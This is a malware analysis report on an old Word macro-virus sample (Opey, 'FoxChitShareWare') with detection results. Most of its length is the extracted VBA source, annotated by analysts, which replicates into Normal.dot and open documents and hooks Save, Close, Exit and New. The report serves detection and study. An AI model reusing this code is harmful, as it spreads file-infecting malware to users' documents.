Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 83734df299f439ce…

MALICIOUS

Office (OLE)

52.0 KB Created: 1999-11-08 15:50:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4b1bbe726f790070a0ddb639bc0e0a8a SHA-1: 31c871b5da07e82c5f88433b2eaa8eacd224821a SHA-256: 83734df299f439ce8b30a9f5248d0bdb8ddcf16edf133ba24f8d7c94c5eba679
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with multiple detections, including 'Doc.Trojan.Opey-18' and 'Doc.Trojan.Opey-6'. It contains VBA macros, specifically an 'AutoOpen' macro, which is a common technique for executing malicious code when the document is opened. The extracted VBA script attempts to remove other VBA components from the Normal template and from open documents, suggesting a self-preservation or anti-analysis function.

Heuristics 4

  • ClamAV: Doc.Trojan.Opey-18 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Opey-18
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; on its own it is not an attribution to a downloader or to a parser CVE.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4620 bytes
SHA-256: 7075034f155d02f93544a0465f16884e9b1c6fdee5f1ffd731ca6cece679ba10
Detection
ClamAV: Doc.Trojan.Opey-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Module headers as decoded by olevba. The first set belongs to the
' document's ThisDocument class module; the second names the module that
' holds the macros below ("FoxChitShareWare"), which is also the component
' name the code later looks for and copies between the Normal template and
' open documents.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "FoxChitShareWare"

' Immunize: the sample's replication routine (the name is a misnomer — it
' spreads the "FoxChitShareWare" module rather than removing it). It is
' called from FileSave, FileClose, FileExit and FileNew below and, given the
' report's AutoOpen finding, presumably from AutoOpen, which is truncated in
' this listing. On Error Resume Next at the top suppresses every error, so a
' partial failure (e.g. VBProject access denied) is silent.
Sub Immunize()
On Error Resume Next
    
    ' Rewrites user identity, document properties and Word options first
    ' (see A_OPEY_03 below).
    Call A_OPEY_03
    Dim DocuName$, OpenDocInfected As Boolean
    Dim I%, J%
    
    ' NmlInfected is never declared (no Option Explicit in view), so it is
    ' an implicitly created Variant used as a Boolean.
    NmlInfected = False
        
    ' Pass 1: walk the Normal template's VBA project backwards (safe while
    ' deleting), note whether the worm module is already present, and delete
    ' every component other than the worm module and ThisDocument.
    For I = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
        DocuName = NormalTemplate.VBProject.VBComponents(I).Name
        If DocuName = "FoxChitShareWare" Then NmlInfected = True
        If (DocuName <> "FoxChitShareWare") And (DocuName <> "ThisDocument") Then
            Application.OrganizerDelete _
                Source:=NormalTemplate.FullName _
                , Name:=DocuName _
                , Object:=wdOrganizerObjectProjectItems
        End If
    Next I
    
    ' Pass 2: for every open document, strip foreign VBA components the same
    ' way, then copy the worm module in from the Normal template and save.
    For Each opendoc In Documents
        OpenDocInfected = False
        With opendoc
            For J = opendoc.VBProject.VBComponents.Count To 1 Step -1
            DocuName = opendoc.VBProject.VBComponents(J).Name
                'If DocuName = "A_OPEY_03" Then OpenDocInfected = True
                'If (DocuName <> "A_OPEY_03") And
                ' "Reference to Normal" is kept as well so the document's
                ' project reference to the Normal template survives.
                If (DocuName <> "FoxChitShareWare") And _
                  (DocuName <> "ThisDocument") And _
                  (DocuName <> "Reference to Normal") Then
                     Application.OrganizerDelete Source:=opendoc.FullName _
                     , Name:=DocuName _
                     , Object:=wdOrganizerObjectProjectItems
                End If
            Next J
            
            ' The only statement that set OpenDocInfected is commented out
            ' above, so this branch always runs: the module is (re)copied
            ' into every open document, which is then written back in place
            ' with SaveAs. Detection note: documents whose VBA project gains
            ' a component named "FoxChitShareWare" are the infection artifact.
            If Not OpenDocInfected Then
                Application.OrganizerCopy Source:=NormalTemplate.FullName, _
                Destination:=opendoc.FullName, _
                Name:="FoxChitShareWare", _
                Object:=wdOrganizerObjectProjectItems
                opendoc.SaveAs FileName:=opendoc.FullName
            End If
        End With
    Next opendoc
    
    ' Pass 3 (persistence): if the Normal template did not already hold the
    ' module, copy it there from the active document and save Normal.dot.
    ' A_OPEY_03 clears SaveNormalPrompt, so this save raises no prompt.
    ' An unexpected modification of the Normal template is the persistence
    ' indicator for this sample.
    If NmlInfected = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
         Destination:=NormalTemplate.FullName, Name:="FoxChitShareWare", _
         Object:=wdOrganizerObjectProjectItems
        NormalTemplate.Save
    End If
    
End Sub
' A_OPEY_03: side-effect routine run at the start of every Immunize call.
' It overwrites Word's user identity fields, stamps the active document's
' summary properties, and changes Word options so that the later Normal
' template save happens silently. All errors are suppressed.
Sub A_OPEY_03()
On Error Resume Next
    
    ' Overwrites the Word user identity (name / address / initials).
    ' Forensic note: these values appearing in Word's user info or in
    ' document metadata are a lead that this sample has run.
    With Application
        .UserName = "Ulysses R. Gotera"
        .UserAddress = "FoxChit SoftWare Solutions"
        .UserInitials = "IOnlyFinishedHighSchool"
    End With
    
    ' Sets Author/Title in the File > Summary Info dialog and applies them
    ' with .Execute (the dialog is not shown to the user).
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "Ulysses Gotera"
        .Title = "FoxChit Software Solutions"
        .Execute
    End With
    
    ' VirusProtection is set to True here, as written; SaveNormalPrompt is
    ' cleared so changes to the Normal template are saved without asking,
    ' which is what lets Immunize's NormalTemplate.Save go unnoticed.
    With Options
        .ConfirmConversions = True
        .VirusProtection = True
        .SaveNormalPrompt = False
    End With
    
    ' Marks the active document "read-only recommended".
    With ActiveDocument
        .ReadOnlyRecommended = True
    End With
    
    ' The following UI-tampering lines (hiding the Visual Basic toolbar,
    ' removing Tools > Macro / Customize, disabling Alt+F11 / Alt+F8) are all
    ' commented out, so this sample does not alter the Word UI. Only the
    ' CustomizationContext assignment is live, and nothing follows it that
    ' makes use of the chosen context.
    On Error Resume Next
    'CommandBars("Visual Basic").Visible = False
    'CommandBars("Visual Basic").Enabled = False
    'CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    'CommandBars("Visual Basic").Protection = msoBarNoCustomize
    'CommandBars("Tools").Controls("Macro").Delete
    'CommandBars("Tools").Controls("Customize...").Delete
    CustomizationContext = NormalTemplate
    'FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    'FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    
End Sub
' FileSave: a Sub named after a built-in Word command replaces that command,
' so every user "Save" runs Immunize (replication) before the real save.
Sub FileSave()
    On Error Resume Next
    Call Immunize
    ActiveDocument.Save
End Sub
' FileClose: hooks the built-in Close command. Runs Immunize, saves the
' document if it has unsaved changes, then closes it — so closing a document
' also writes the infected copy back to disk.
Sub FileClose()
    On Error Resume Next
    Call Immunize
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
End Sub
' FileExit: hooks the built-in Exit command. Same pattern as FileClose:
' Immunize, save if dirty, then quit Word.
Sub FileExit()
    On Error Resume Next
    Call Immunize
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub
' FileNew: hooks the built-in New command. Shows the normal File > New
' dialog first, then runs Immunize so the freshly created document is
' among the open documents that receive the module.
Sub FileNew()
On Error Resume Next
    Dialogs(wdDialogFileNew).Show
    Call Immunize
End Sub
Sub AutoOpen()
On Error Resume N
... (truncated)